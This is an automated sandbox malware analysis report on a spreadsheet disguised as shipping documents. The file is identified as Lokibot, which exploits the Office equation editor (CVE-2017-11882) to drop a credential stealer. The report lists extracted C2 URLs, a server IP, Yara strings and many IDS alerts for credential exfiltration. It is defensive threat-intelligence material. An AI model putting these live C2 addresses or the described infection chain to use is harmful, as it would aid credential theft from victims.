Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Original shipping documents.xlsx

Overview

General Information

Sample Name:Original shipping documents.xlsx
Analysis ID:491904
MD5:27eb25e6fbbbd37115055ecc4b557c53
SHA1:4c986607a941900d9d8804aa351dcab0cc4de224
SHA256:09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2688 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1484 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1268 cmdline: 'C:\Users\Public\vbc.exe' MD5: 59A67B5CCF01B6A564265797DC5E53E8)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://checkvim.com/ga14/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              4.2.vbc.exe.400000.1.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              4.2.vbc.exe.400000.1.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x13bff:$des3: 68 03 66 00 00
              • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 25 entries

              Sigma Overview

              Exploits:

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.83.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1484, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1484, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1484, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1268
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1484, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1268

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://checkvim.com/ga14/fre.php"]}
              Antivirus detection for URL or domainShow sources
              Source: http://checkvim.com/ga14/fre.phpAvira URL Cloud: Label: malware

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: 5}NC:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: Binary string: C:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: global trafficDNS query: name: checkvim.com
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.155.83.184:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.155.83.184:80

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49168
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49169
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49170
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49171
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49172
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49173
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49175
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49176
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49177
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49178
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49179
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49180
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49181
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49182
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49183
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49184
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49185
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49186
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49187
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49188
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49189
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49190
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49191
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49192
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49193
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49194
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49195
